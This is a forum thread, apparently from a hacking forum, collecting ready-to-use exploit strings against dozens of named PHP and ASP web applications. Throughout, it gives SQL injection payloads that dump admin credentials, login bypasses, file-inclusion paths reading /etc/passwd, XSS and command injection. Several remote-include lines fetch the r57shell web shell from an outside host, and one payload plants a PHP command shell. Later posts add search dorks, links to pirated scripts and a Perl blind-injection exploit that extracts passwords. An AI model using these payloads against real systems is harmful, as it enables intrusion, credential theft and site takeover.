Encyclopedia of vulnerable scripts

  1. This collection of vulnerable scripts was assembled by DIAgen. If it is useful to anyone, then it was all worth doing.

    Code:
    Forums

    phpBB v.2.0.15 PHP code execution in viewtopic.php
    viewtopic.php?t=1&highlight='.printf(md5(test)).'
    PBLang 4.65 Local file include
    setcookie.php?u=../../../../../../../../../../etc/passwd%00
    setcookie.php?u=../../../../../../../../../../boot.ini%00
    PHPTB v.2.0 File include
    /classes/admin_o.php?absolutepath=http://rst.void.ru/download/r57shell.txt
    MailGust v.1.9 SQL Injection
    POST request to index.php
    method=remind_password&list=maillistuser&fromlist=maillist&frommethod=showhtmllist&email=1%27%20union%20select%20%2A%20from%20force_sql_error%2F%2A%40hotmail%2Ecom&submit=Ok&showAvatar
    Chipmunk Forum XSS
    newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
    oaboard v.1.0 SQL Injection
    forum.php?channel=0%20union%20select%20*%20from%20force_mysql_table_error
    Phorum 5.0.20 SQL Injection
    search.php?1,search=%20,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error
    Cyphor 0.19 XSS
    /include/footer.php?t_login=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    W-Agora 4.2.0 XSS
    /templates/admin/login_form.php?msg_login=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    WizForum 1.20 SQL Injection
    ForumTopicDetails.php?TopicID=11111111%20union%20Select%20*%20from%20EronatedInexistentTable
    EkinBoard 1.0.3 SQL Injection
    admin/index.php?page=general&step=2
    Cookie: username=%27or+isnull%281%2F0%29+AND+level%3D3%2F%2A; password=
    Snitz Forums 2000 v.3.4.05 XSS
    post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&type=xss-${random}
    PHP-Post 1.0 XSS
    profile.php?user='%3CIFRAME%20SRC=javascript:alert(%2527xss-${random}%2527)%3E%3C/IFRAME%3E
    WSN Forum 1.21 SQL Injection
    memberlist.php?action=profile&id=1'%20select%20*%20from%20force_mysql_warning
    sCssBoard 1.12 XSS
    index.php?act=search-results
    POST search_term=%3Cscript%3Ealert%28%27wvs-${random}%27%29%3C%2Fscript%3E+&sortby=relevancy
    freeForum 1.1 SQL Injection
    forum.php?mode=thread&thread=force_mysql_fetch_object_warning
    Orca Forum 4.3.b SQL Injection
    forum.php?msg=2'force_mysql_num_rows_warning
    Pearl Forums 2.4 SQL Injection
    index.php?mode=forums&forumId=1%20union%20select%20*%20from%20force_error
    SimpleBBS v.1.1 PHP code execution
    index.php?v=newtopic&c=1
    POST name=<?php echo md5("test");?>&subject=mysubject&message=mymessage&sendTopic=Send
    ADP Forum v.2.0.2 User information disclosure
    /users/
    ADN Forum v.1.0b SQL Injection
    verpag.php?pagid=999'%20and_force_mysql_error/*
    MyBuletinBoard v.1.0.2 Table prefix disclosure
    search.php?s=de1aaf9b&action=do_search&keywords=a&srchtype=3
    MyTopix v.1.2.3 SQL Injection and script path disclosure
    /modules/logon.mod.php
    Pentacle In-Out Board v.6.03.0.0080 SQL Injection
    login.asp POST username=anypassword&userpassword=%27+or+%271%27%3D%271&Submit=Log+in
    Battleaxe Software Forums v.2.0 XSS
    failure.asp?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext
    
    
    PHP Libraries

    PEAR XML_RPC 1.3.0 Command execution (affected: PEAR XML_RPC versions up to 1.3.0. Affected web applications: TikiWiki, PostNuke, Drupal, b2evolution, b2, phpGroupWare, eGroupware, Serendipity Weblog, phpAdsNew, Max Media Manager, phpWiki, Blog:CMS, CivicSpace)
    xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php
    POST <?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>','')); printf(md5(acunetix_wvs_security_test)); exit;//</name></value></param></params></methodCall>
    ADOdb
    1) SQL Injection
    /server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
    2) PHP function execution
    /tests/tmssql.php?do=phpinfo
    
    
    Network tools

    phpLDAPadmin 0.9.6 PHP code execution
    welcome.php?custom_welcome_page=http://rst.void.ru/download/r57shell.txt
    Netquery [host] Arbitrary command execution
    nquser.php POST
    1) querytype=dig&host=a%27%7Ccat%20%27%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17
    2) querytype=dig&host=%7Ccat%20%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17
    
    
    Calendars and Schedulers

    phpCommunityCalendar v.4.0.3 Login bypass
    webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+%2F*&Password=&Returned=1
    Calendarix v.1.6 SQL Injection
    cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*&password=any
    Teca Diary Personal Edition v.1.0 SQL Injection
    index.php?mm='%20force_sql_error&yy=2006
    CALimba v.0.99.2 SQL Injection
    index.php POST ute_login=%27%29+or+isnull%281%2F0%29%2F*&ute_password=anypassword&cmdOK=Login%21
    Maian Events v.1.00 SQL Injection
    menu.php?month='forceerror'
    
    
    News blocks

    myBloggie 2.1.3 SQL Injection
    login.php POST username=%27+or+isnull%281%2F0%29+%2F*&passwd=&submit=Log+In
    Simplog 0.9.1 SQL Injection
    archive.php?blogid=force_error_for_test_reason
    Zomplog 3.4 XSS
    get.php?username=%3Cbr%3E%3Cb%3Exss%3C/b%3E%3Cbr%3E
    CuteNews 1.4.1 Shell Injection
    show_archives.php?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22test%22);%20die;?%3E.%22%20HTTP/1.0\r\n
    Cute News 1.4.1 Local File Inclusion
    show_archives.php?template=../../../../../../../../../../etc/passwd%00
    show_archives.php?template=../../../../../../../../../../boot.ini%00
    SimpleBlog v.2.1 SQL Injection
    default.asp?view=archives&month=%22generate_error&year=2004
    Bit5blog v.8.1 SQL Injection
    admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2F*&password=%27+or+isnull%281%2F0%29%2F*
    WebspotBlogging v.3.0 SQL Injection
    login.php POST username=%27+or+isnull%281%2F0%29%2F*&password=anypassword
    e-moBLOG v.1.3 SQL Injection
    /admin/index.php POST login=aaa%27+union+select+%27bbb%27%2C+%27161da2fa81d32d4071ee16f7f77cb463%27%2F*&password=any_password
    miniBloggie v.1.0 SQL Injection
    login.php POST user=%27+or+isnull%281%2F0%29%2F*&pwd=%27+or+isnull%281%2F0%29%2F*&submit=Log+In
    Text Rider v.2.4 User list
    /data/userlist.txt
    AndoNET Blog SQL Injection
    index.php?ando=comentarios&entrada=1'generate%20error
    Loudblog v.0.4 PHP Code Injection
    /loudblog/inc/backend_settings.php?GLOBALS[path]=http://rst.void.ru/download/r57shell.txt
    PluggedOut Blog v.1.9.9c SQL Injection
    exec.php?action=comment_add&entryid=force_error
    Clever Copy v.3.0 SQL Injection
    mailarticle.php?ID='UNION%20SELECT%200,0,0,0,0,0,username,password,0,0,0,0,0,0,0,0,0%20FROM%20CC_admin/*
    Magic News Lite v.1.2.3 Code Injection
    preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
    WordPress v.2.0.1 Path disclosure
    /wp-includes/default-filters.php
    sBlog v.0.7.2 XSS
    search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
    Maian Weblog v.2.0 SQL Injection
    print.php?cmd=log&entry=1'%20or%20generate_error=2
    
    
    Faq Systems

    phpMyFAQ 1.5.1 SQL Injection
    admin/password.php POST username=%27+or+isnull%281%2F0%29+%2F*&[email protected].com
    A-FAQ 1.0 SQL Injection
    faqDsp.asp?catcode=12%20union%20select%20name%20from%20msysobjects%20in%20'\nopath\sqlerr
    Atlantis Knowledge Base Software v.3.0 SQL Injection
    search.php POST searchStr=%25%27+union+select+*+from+force_mysql_warning%2F*
    ASP Survey v1.10 SQL Injection
    /Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&Dest=http%3A%2F%2Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2FDefault.asp
    Owl v.0.82 File Inclusion
    /lib/OWL_API.php?xrms_file_root=nonexistent_test_includefile%00
    
    
    Web Portals
    
    PHPNuke 7.8 Remote Directory Traversal
    modules.php?name=Search&file=../../../../../../../../../../etc/passwd%00
    modules.php?name=Search&file=../../../../../../../../../../../boot.ini%00
    
    
    Partner systems

    TWiki rev Parameter Remote Command Execution Vulnerability
    view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
    view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cboot%2Eini
    PmWiki 2.0.12 q-Parameter XSS
    pmwiki.php?n=Site.Search?action=search&q=test_search_item%27%20onMouseOver%3D%27alert%28%22wvs-xss-magic-string-${random}%22%29%3B%27%20

    ProjectApp v.3.3 XSS
    default.asp?skin_number=XSS.css%22%3E%3Cscript%3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
    IntranetApp v.3.3 XSS
    login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
    dotproject v.2.0.1 File Inclusion
    includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
    Qwiki v.1.5.1 XSS
    index.php?page=Home&from='%3Cscript%3Ealert(%22xss-${random}%22)%3C/script%3E
    
    
    Administration Tools

    phpMyAdmin grab_globals.lib.php
    libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../../../../etc/passwd&subform[1]
    libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../../../../boot.ini&subform[1]
    phpMyAdmin XSS
    queryframe.php?lang=en-iso-8859-1&server=1&hash=">='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
    phpMyAdmin Path disclosure
    libraries/charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
    
    
    CMS Systems

    PHP-Fusion 6.00.109 SQL Injection
    faq.php?cat_id=1%27%20or%20force_mysql_error%3D%272
    MySource 2.14.0 File Inclusion
    init_mysource.php?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
    e107 v0617 SQL Injection
    e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&usubmit=Continue
    lucidCMS 1.0.11 SQL Injection
    index.php?command=panel
    PhpWebThings 1.4.4 SQL Injection
    forum.php?forum=-1%20union%20select%20password,password,null,null%20from%20test_mysql_injection%20where%20uid=1/*
    Envolution v.1.1.0 SQL Injection
    modules.php?op=modload&name=News&file=index&catid=%221%22%20AND%20force_error=error
    Acidcat v.2.1.13 SQL Injection
    default.asp?ID=26%20union%20select%201,2,2,3,password,5,6%20from%20Configuration
    DEV v1.5 SQL Injection
    index.php?session=0&action=openforum&cat=force_error
    SiteEnable v.3.3 XSS
    login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
    PortalApp v.3.3 XSS
    login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
    Typo3 v.3.8.1 Path disclosure
    /tslib/showpic.php
    RunCMS v.1.3a5 XSS
    /modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');%3C/script%3E%3Cbr%20name=%22nothing
    Mambo v.4.5.3h SQL Injection
    /index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypassword&option=login&Submit=Login&op2=login&lang=english&return=${file}&message=0
    Dragonfly CMS v.9.0.6.1 XSS
    /index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat=0&news_search_comments=0&coppermine=
    Nodez v.4.6.1.1 XSS
    /index.php?node=system&op=block%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E&block=3&bop=more
    XOOPS v.2.0.11 SQL Injection
    /xmlrpc.php POST <?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value><string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>
    
    
    Gallery Applications

    Gallery "g2_itemId" local include
    main.php?g2_itemId=/../../../../../../../../../../../boot.ini%00
    main.php?g2_itemId=/../../../../../../../../../../../etc/passwd%00
    /upgrade/index.php?stepOrder[]=../../../../../../../../include_inexistent_file.txt%00
    Coppermine Photo Gallery v.1.4.2 Configuration ignored
    relocate_server.php POST continue=1
    Instant Photo Gallery v.1.0 SQL Injection
    portfolio.php?cat_id="force_sql_error
    Enhanced Simple PHP Gallery v.1.7 Path disclosure
    index.php?dir=inexistent_directory
    WhiteAlbum v.2.5 SQL Injection
    pictures.php?dir=force_mysql_warning
    LinPHA v.1.0 Local File Inclusion
    /docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
    /docs/index.php?lang=/../../../../../../../../../../boot.ini%00
    
    
    Script Collections

    Codegrrl Arbitrary Local File Inclusion
    protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd%00
    protection.php?action=logout&siteurl=../../../../../../../../../../boot.ini%00
    Techno Dreams Products SQL Injection
    admin/login.asp POST userid=%27union+all+select+%271%27%2C%271%27+from+admin+where+%27%27%3D%27&passwd=1&submit=Login
    AlstraSoft Template Seller Pro 3.25 File Inclusion
    include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
    AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
    admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F*&passwd=&B1=Login
    OpenEdit v.4.0 XSS
    /store/search/results.html?page=%3Ciframe%3Exss-${random}%3C/iframe%3E
    
    
    E-commerce

    Zend Cart 1.2.6 SQL Injection
    admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0+INTO+OUTFILE+%27shell.php%27+FROM+force_table_error%2F*&submit=resend
    Lizard Cart CMS v.1.0.4 SQL Injection
    detail.php?id=-1'
    My Amazon Store Manager v1.0 XSS
    /search.php?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
    CRE Loaded v.6.15 XSS
    /admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
    NZ Ecommerce SQL Injection
    /index.php?action=Information&informationID=1%20and%20generate_error=error
    
    
    Guest Book Applications

    Ades Guestbook v.2.0 XSS
    read.php?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3E
    Mantis 1.00 File Inclusion
    bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd%00
    bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../../boot.ini%00
    Flyspray 0.9.8 XSS
    index.php?tasks=all%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%26project%3D0
    Gemini v.2.0 XSS
    /issue/createissue.aspx?rtcDescription$RadEditor1=1><script>alert(${random});</script>
    
    
    Other tools

    Digital Scribe 1.4 SQL Injection
    login.php POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
    ATUTOR 1.5.1 SQL Injection
    password_reminder.php POST form_password_reminder=true&form_email=%27
    PHP Advanced Transfer Manager System local include
    viewers/txt.php?filename=../../../../../../../../../../boot.ini%00
    viewers/txt.php?filename=../../../../../../../../../../etc/passwd%00
    Chipmunk Topsites XSS
    recommend.php?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
    Chipmunk Directory XSS
    recommend.php?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
    Gcards 1.44 limit parameter SQL Injection
    news.php?limit=force_sql_error
    phpSysInfo 2.3 XSS
    index.php?VERSION=%22%3E%3Cscript%3Ealert('FORCE_XSS')%3C/script%3E
    Advanced Poll 2.03 XSS
    popup.php?poll_ident=%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E
    PHPGreetz 0.99 Remote File Include
    content.php?content=http://rst.void.ru/download/r57shell.txt
    eFiction 1.1 XSS and SQL Injection
    titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
    Google API Search Engine v.1.3.1 XSS
    index.php?REQ=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmit=Submit
    phpArcadeScript v.2.0 XSS
    /includes/tellafriend.php?about=game&gamename=%3Cscript%3Ealert(${random});%3C/script%3E
    Haven't tried it myself ;) maybe someone will find it useful ;)
     
  2. Thanks a lot!! ))
     
  3. The formatting is awful! )
    I'll tidy it up when I have some spare time...
     
  4. Update by DIAgen
     
  5. Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Code:
    listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*
    http://milw0rm.com/exploits/6298

    Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

    magic_quotes_gpc = Off

    http://localhost/[installdir]/

    Exploit:

    Code:
    index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Code:
    index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
    Dork:

    made by matterdaddy

    http://milw0rm.com/exploits/6297

    iFdate <= 2.0.3 Remote SQL Injection Vulnerability

    Condition: magic_quotes_gpc = Off

    http://localhost/[installdir]/members_search.php

    Search Name/Nickname

    Exploit 1:

    Code:
    ' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
    Exploit 2:

    Code:
    ' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
    http://milw0rm.com/exploits/6315
    (c) ~!Dok_tOR!~
     
  6. YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

    Author: ~!Dok_tOR!~
    Date found: 28.08.08
    Product: YourOwnBux
    Version: 3.1, 3.2
    Price: $39.99
    DEMO: yourownbux.com/demos/
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    3.2 Beta version

    Exploit:

    http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*

    3.1 version

    Exploit:

    http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*
    http://milw0rm.com/exploits/6321

    phpMyRealty <= 1.0.9 Multiple Remote SQL Injection Vulnerabilities

    Author: ~!Dok_tOR!~
    Date found: 27.08.08
    Product: phpMyRealty
    Version: 1.0.7, 1.0.9
    Vulnerability Class: SQL Injection

    Exploit 1:

    http://localhost/[installdir]/pages.php?id=-999999+union+select+concat_ws(0x3a,login,password),2,3+from+pmr_admins/*

    Exploit 2:

    http://localhost/[installdir]/search.php?price_min=50000&price_max=-999999+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,login,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+pmr_admins/*

    Admin panel:

    http://localhost/[installdir]/admin/

    Dork:

    Powered by phpMyRealty 1.0.7
    Powered by phpMyRealty.com

    http://milw0rm.com/exploits/6320

    (c) ~!Dok_tOR!~
     
  7. Battle Scrypt SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 26.08.08
    Product: Battle Scrypt
    Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Code:
    http://localhost/[installdir]/search.php
    Model Name:

    Exploit:

    Code:
    ' union select 1,user(),3/*
    Code:
    http://localhost/[installdir]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*

    Big Fat Rate My Photo AdSense Website SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 29.08.08
    Product: Big Fat Rate My Photo AdSense Website
    Price: $14.99
    URL: www.dotcomallsorts.com
    Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website.rar
    Vulnerability Class: SQL Injection

    Exploit 1:

    Code:
    http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
    Admin panel:

    Code:
    http://localhost/[installdir]/admin/

    Article Publisher Pro <= v1.5 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Article Publisher Pro v1.5
    Price: $75
    URL: www.phparticlescript.com
    Vulnerability Class: SQL Injection

    Exploit 1:

    Code:
    http://localhost/[installdir]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
    Dork:

    All rights reserverd © Your Articles Pro 2002-2005
    Copyright 2006 - 2008, Article Publisher PRO v1.5


    Keepsakes SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 28.08.08
    Product: Keepsakes
    Price: $25
    URL: harlandscripts.com
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
    Opera -> Source(Ctrl+F3)

    Exploit 2:

    Code:
    http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
    Opera -> Source(Ctrl+F3)

    Exploit 3:

    Code:
    http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
    Opera -> Source(Ctrl+F3)

    Exploit 4:

    Code:
    http://localhost/[installdir]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Exploit 5:

    Code:
    http://localhost/[installdir]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
    Admin panel:

    Code:
    http://localhost/[installdir]/admin/
    Dork:
    Copyright Your Keepsakes ® ™ 2007


    Smart Traffic 6 in 1 SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: Smart Traffic 6 in 1
    Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit:

    Code:
    http://localhost/[installdir]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*

    TopCoolive SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 30.08.08
    Product: TopCoolive
    URL: www.vetton.ru
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[installdir]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
    Exploit 3:

    Code:
    http://localhost/[installdir]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*

    Warez Script (by Mikel Dean) SQL Injection

    Author: ~!Dok_tOR!~
    Date found: 27.08.08
    Product: Warez Script
    Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
    Vulnerability Class: SQL Injection
    Condition: magic_quotes_gpc = Off

    Exploit 1:

    Code:
    http://localhost/[installdir]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
    Exploit 2:

    Code:
    http://localhost/[installdir]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
    Code:
    http://localhost/[installdir]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
    Admin Authentication Bypass

    Code:
    http://localhost/[installdir]/v2/login.php
    User: 1' or 1=1/*
    Pass: 1' or 1=1/*
     
  8. Extreme CMS 0.9

    SQL Injection

    Vuln file: /calendar/show.php
    PHP:
    // ...
    $id = $_GET['event']; // from clicked day
    $sho = $_GET['sho']; // display method
    $query = "SELECT * FROM calendar WHERE id = '$id' "; // retrieves ONE record
    $result = mysql_query($query);
    $myrow = mysql_fetch_array($result);
    $ev_1 = $myrow['ev_dat']; // is date for that record (allows multiple events selection)

    $found = $myrow['ev_dat'];
    $pieces = explode("-", $ev_1);
    $monum = intval($pieces[1]);

    $query = "SELECT * from calendar WHERE ev_dat = '$ev_1' "; // retrieves ALL date matches
    $result = mysql_query($query);
    echo "<table width='480' 'cellpadding='3' cellspacing='3' align='center' style='border: thin dotted #cccccc;' bgcolor='#f7f7f7'><tr><td>";
    echo "<h2>" . $mo[$monum] . " " . intval($pieces[2]) . ", " . intval($pieces[0]) . "</h2>";
    // ...
    There is no filtering of incoming data at all. But there is one catch... the result of the SQL query is processed with intval.
    To get around intval (if that can be called getting around :)) and to simplify the output, I wrote an exploit

    Exploit:
    Code:
    #!/usr/bin/perl
    #-----------------------------------------
    #  Extreme CMS 0.9 SQL Injection Exploit 
    #-----------------------------------------
    # Download Script : http://sourceforge.net/projects/extremecms
    #
    # Author          : RulleR aka Pin4eG                 
    # Contact         : rull3rrr[at]gmail[dot]com            
    # Visit           : forum.antichat.ru
    #-----------------------------------------
    
    use LWP;
    use Fcntl;
    
    #________________ CONFIG _______________
    
    $vuln = '/calendar/show.php?event=';
    $length = 40;
    $column_name = 'password';
    $table_name = 'auth';
    $id = 1; # user id
    $regexp = '<h2> 0, (.*)<\/h2>';
    $filename = 'Exp_result.txt';
    #_______________________________________
    
    
    
    $title = "
    
    [*]==================================[*]
    !                                      !
    !  Extreme CMS SQL Injection Exploit   !
    !                                      !
    !          Found && coded by RulleR    !
    !                                      !
    
    [*]==================================[*]
    ";
    print $title;
    print "\n[+] Enter Host: ";
    chop ($host = <>);
    print "\n[>] Exploiting started... $host\n";
    
    for ($start = 1; $start<=$length; $start++) {
    	$inj = '-1%27+union+select+null,ord(substr((select+'.$column_name.'+from+'.$table_name.'+where+id='.$id.'),'.$start.',1)),null,null,null+--+';
    	$req = $host.$vuln.$inj;
    	$cont = &WebGet($req);
    	$cont =~ /$regexp/;
    	last if (!$1);
    	$char = chr($1);
    	push (@res, $char);
    }
    
    print "\n------------- [Result] --------------\n";
    print @res;
    print "\n-------------------------------------\n";
    print "\n[!] Exploiting finished :)\n";
    sysopen (RESULT, $filename, O_WRONLY | O_CREAT);
    print RESULT $title;
    print RESULT "\n------------- [Result] --------------\n";
    print RESULT @res; 
    print RESULT "\n-------------------------------------\n";
    close (RESULT);
    print "\nResult saving in $filename\n";
    
    sub WebGet() {
        $url = $_[0];
    	$request = HTTP::Request->new(GET => $url);
    	$u_a = LWP::UserAgent->new();
    	$u_a->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    	$u_a->timeout(5);
    	$response = $u_a->request($request);
    	if ($response->is_error) {
    	    print " ! Error: ".$response->status_line.".\n"; die " :(\n";
    	}
        return $response->content;
    }
    
    securityreason.com
    Required for successful exploitation:
    magic quotes = Off


    Added 2 minutes later
    MachCMS 1.0
    Web site : http://machcms.sourceforge.net
    Version : 1.0
    Author : Arthur Wiebe



    [Local File Inclusion]

    Vuln file: classes/Template.php [line 61]

    PHP:
    if (file_exists("pages/$page.page/main.php")) {
        $template = $this;
        require_once("pages/$page.page/main.php");
        $this->parse();
    }
    Exploit:
    if magic_quotes = OFF

    Code:
    http://[host]/[path]/index.php?q=../../../../../../../../[local_file]%00
    © RulleR aka Pin4eG
